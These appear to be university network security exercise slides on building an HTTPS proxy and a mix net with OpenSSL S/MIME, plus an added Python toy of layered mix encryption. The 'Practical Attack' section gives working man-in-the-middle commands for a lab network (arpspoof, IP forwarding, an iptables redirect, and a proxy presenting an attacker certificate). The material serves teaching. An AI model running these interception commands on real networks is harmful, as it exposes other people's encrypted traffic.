NetSec Exercise 8 Communication Mixes


NetSec Exercise 8: Communication Mixes
Thomas Schneider
Computer Networks and Communication Systems, Dept. of Computer Sciences, University of Erlangen-Nuremberg, Germany
11.1.2008
Thomas Schneider: NetSec Exercise 8 Communication Mixes 1 / 22

Exercise: HTTPS Proxy (wproxy)

wproxy = wserver + wclient:
  1. Incoming SSL connection from the client: initialize_ctx(proxykey, proxycert), tcp_listen, while(1): accept, fork, SSL_accept
  2. New SSL connection to the server: initialize_ctx, tcp_connect, SSL_connect
  3. Read the GET request from the client, write it to stdout and to the server: while(1): BIO_gets(client, buf), fwrite(buf, stdout), SSL_write(server, buf); break on the blank line that ends the request
  4. Read the HTTP response from the server, write it to stdout and to the client: while(1): SSL_read(server, buf), if (SSL_get_error() == SSL_ERROR_ZERO_RETURN) break, fwrite(buf, stdout), SSL_write(client, buf)
  5. Shut down the SSL and TCP connections to client and server: SSL_shutdown, close

Practical Attack: ARP-Spoofing + HTTPS Proxy (Exercise 7, 5f)

Diagram: Client <-SSL-> SSL Proxy (Attacker) <-SSL-> Server
  Client:            wclient -h proxyip -p 4444 -v
  Server:            wserver (IP: serverip, port 4433)
  Proxy (Attacker):  wproxy -p 4444 -i serverip -c attackcert.pem (IP: proxyip, port 4444)
  Lab network labels: 192.168.10X.1, 192.168.10X.2, 192.168.10X.254; switch ports 14, 2, 19; VLAN 400X
  Each machine is reached via ssh -Y <host>

Commands on the attacker machine:
  arpspoof -i eth1 -t <IP_Client> <IP_Server>
  arpspoof -i eth1 -t <IP_Server> <IP_Client>
  echo 1 > /proc/sys/net/ipv4/ip_forward
  iptables -t nat -A PREROUTING -i eth1 \
      -p tcp --dport 4433 -j REDIRECT \
      --to-port 4433
  wproxy -p 4433 -i <IP_Server> \
      -c attackcert.pem


Exercise: MixNet
  - Implement mixnode and mixclient for a mix net
  - OpenSSL for digital signatures and asymmetric encryption
  - Messages are encoded with S/MIME; the To: header contains the hostname of the next mix
  - Mixes are connected via plain TCP/IP on port 4444 (no SSL)
  - Use the private key (groupkey.pem) and certificate (groupcert.pem) of your group for decrypting messages sent to your mixnode

S/MIME (Secure/Multipurpose Internet Mail Extensions)
  - Standard for public-key encryption and signing of messages (email)
  - MIME defines how the body of a mail is structured
  - S/MIME signs/encrypts the body of a message (not the header)

S/MIME encrypted message body format:
  MIME-Version: 1.0
  Content-Disposition: attachment; filename="smime.p7m"
  Content-Type: application/x-pkcs7-mime; smime-type=enveloped-data; name="smime.p7m"
  Content-Transfer-Encoding: base64

  MIIJMgYJKoZIhvcNAQcDoIIJIzC...

S/MIME signed message body format (the boundary string in the Content-Type header must match the separators in the body exactly, including case):
  MIME-Version: 1.0
  Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="----92B858AC09E7231793CC2E727DF4DB73"

  This is an S/MIME signed message

  ------92B858AC09E7231793CC2E727DF4DB73
  Message Text
  ------92B858AC09E7231793CC2E727DF4DB73
  Content-Type: application/x-pkcs7-signature; name="smime.p7s"
  Content-Transfer-Encoding: base64
  Content-Disposition: attachment; filename="smime.p7s"

  MIINbAYJKoZIhvcNAQcCoI...
  ------92B858AC09E7231793CC2E727DF4DB73--

S/MIME with OpenSSL
S/MIME support in OpenSSL (man smime):
  Sign:
    openssl smime -sign -in message.txt \
        -inkey signkey.pem -signer signcert.pem \
        > signed_message.txt
  Encrypt:
    openssl smime -encrypt -aes128 \
        -in message.txt -to hostname_of_receiver \
        receivercert.pem > encrypted_message.txt
  Sign+Encrypt: first sign, then encrypt; the encrypt command has no -in parameter and reads the signed message from the pipe:
    openssl smime -sign ... | \
    openssl smime -encrypt ... \
        > sign_enc_message.txt

Prepare Mix message
Prepare message m to be sent from A to B via M1 and M2 (sign as A, then encrypt for B, then for M2, then for M1, so that M1 removes the outermost layer):
  openssl smime -sign -in m.txt \
      -inkey Akey.pem -signer Acert.pem | \
  openssl smime -encrypt -aes128 \
      -to B_hostname Bcert.pem | \
  openssl smime -encrypt -aes128 \
      -to M2_hostname M2cert.pem | \
  openssl smime -encrypt -aes128 \
      -to M1_hostname M1cert.pem \
      > mix_message.txt
  cat mix_message.txt
  To: M1_hostname
  MIME-Version: 1.0
  ...

Mixclient
mixclient reads the mixed message from stdin and delivers it to the first hostname (To: ...) via TCP/IP port 4444:
  A> ./mixclient < mix_message.txt
  Delivering message to M1_hostname

Mixnode
mixnode receives messages on TCP/IP port 4444 and decrypts them with its groupkey.pem and groupcert.pem. Afterwards it checks whether another To: ... is given in the decrypted message:

YES, To: given: deliver the decrypted message to the next mix named after To: via TCP/IP port 4444
  M1> ./mixnode
  Enter PEM pass phrase:
  Listening for incoming connections.
  --- Starting to process message from IP_A...
  Decrypting message...
  Delivering message to HOSTNAME_M2
  Message processed.

NO To: given: check that the signature of the sender is OK (certificate path to the NetSecCA rootcert.pem) and output the message
  B> ./mixnode
  Enter PEM pass phrase:
  Listening for incoming connections.
  --- Starting to process message from IP_M3...
  Decrypting message...
  Verifying signature...
  Message from /C=DE/ST=Bavaria/L=Erlangen/O=FAU /OU=CS 7 / NetSec/CN=NetSec CA/emailAddress=...
  ---
  Message Text...
  ---
  Message processed.
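The layering from "Prepare Mix message" and the mixnode decision (forward if a To: header remains after decrypting, otherwise verify the signature and output), as an added Python example that is not part of the original exercise or its OpenSSL tooling. The hostnames and keys are constructed; a keystream XOR and an HMAC stand in for the S/MIME enveloped-data encryption and the PKCS#7 signature so that the layer-peeling logic runs offline without OpenSSL.

```python
import base64, hashlib, hmac
from email.parser import Parser

# Constructed demo keys, one per host: stand-ins for each group's groupkey.pem/groupcert.pem and A's signing key.
KEYS = {"M1": b"m1-secret", "M2": b"m2-secret", "B": b"b-secret", "A": b"a-signing-secret"}

def _xor_stream(key, data):
    """Toy symmetric cipher (SHA-256 counter keystream XOR) standing in for PKCS#7 enveloped-data."""
    out = bytearray()
    for i in range(0, len(data), 32):
        ks = hashlib.sha256(key + i.to_bytes(4, "big")).digest()
        out += bytes(b ^ k for b, k in zip(data[i:i + 32], ks))
    return bytes(out)

def sign(sender, text):
    """Stand-in for 'openssl smime -sign': an HMAC tag instead of a PKCS#7 signature."""
    tag = hmac.new(KEYS[sender], text.encode(), "sha256").hexdigest()
    return f"Signer: {sender}\nSignature: {tag}\n\n{text}"

def encrypt_for(host, inner):
    """Stand-in for 'openssl smime -encrypt -to host hostcert.pem': To: header plus base64 body."""
    ct = base64.b64encode(_xor_stream(KEYS[host], inner.encode())).decode()
    return (f"To: {host}\nMIME-Version: 1.0\n"
            f"Content-Type: application/x-pkcs7-mime; smime-type=enveloped-data\n\n{ct}\n")

def prepare_mix_message(sender, text, path):
    """Layer the signed message along path [M1, M2, ..., B]: innermost layer for B, outermost for M1."""
    msg = sign(sender, text)
    for host in reversed(path):
        msg = encrypt_for(host, msg)
    return msg

def mixclient_destination(msg):
    """mixclient: the first hop is the To: header of the outermost layer (delivered on TCP port 4444)."""
    return Parser().parsestr(msg)["To"]

def mixnode_process(host, msg):
    """mixnode: strip one layer with own key; return ("forward", next_hop, layer) or ("deliver", signer, text)."""
    outer = Parser().parsestr(msg)
    if outer["To"] != host:
        raise ValueError(f"{host}: message addressed to {outer['To']}, cannot decrypt")
    inner = _xor_stream(KEYS[host], base64.b64decode(outer.get_payload())).decode()
    parsed = Parser().parsestr(inner)
    if parsed["To"]:                      # YES, To: given -> deliver to the next mix via port 4444
        return ("forward", parsed["To"], inner)
    text = parsed.get_payload()           # NO To: -> final recipient, check the sender's signature
    expected = hmac.new(KEYS[parsed["Signer"]], text.encode(), "sha256").hexdigest()
    if not hmac.compare_digest(expected, parsed["Signature"]):
        raise ValueError("signature check failed")
    return ("deliver", parsed["Signer"], text)
```

Each hop only learns the next hostname, which is the property the mix net relies on; a node that receives a layer not addressed to it cannot strip it.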

OpenSSL Coding Hints
  - Load private key from file: PEM_read_PrivateKey
  - Load X509 certificate from file: PEM_read_X509
  - Load root certificate from file: X509_STORE_new, X509_STORE_set_verify_cb_func(store, NULL), X509_STORE_add_lookup(store, X509_LOOKUP_file()), X509_LOOKUP_load_file(lookup, rootcert.pem, ...)
  - Show IP address of TCP connection: accept, inet_ntop
  - Decrypt message: BIO_new_mem_buf, SMIME_read_PKCS7, bio_decrypted = BIO_new(BIO_s_mem()), PKCS7_decrypt
  - Deliver to next mix (To: given): BIO_gets, BIO_get_mem_data
  - Check signature and show message (no To:): SMIME_read_PKCS7, PKCS7_verify, PKCS7_get0_signers, sk_X509_value, X509_NAME_oneline
Thomas Schneider: NetSec Exercise 8 Communication Mixes 22 / 22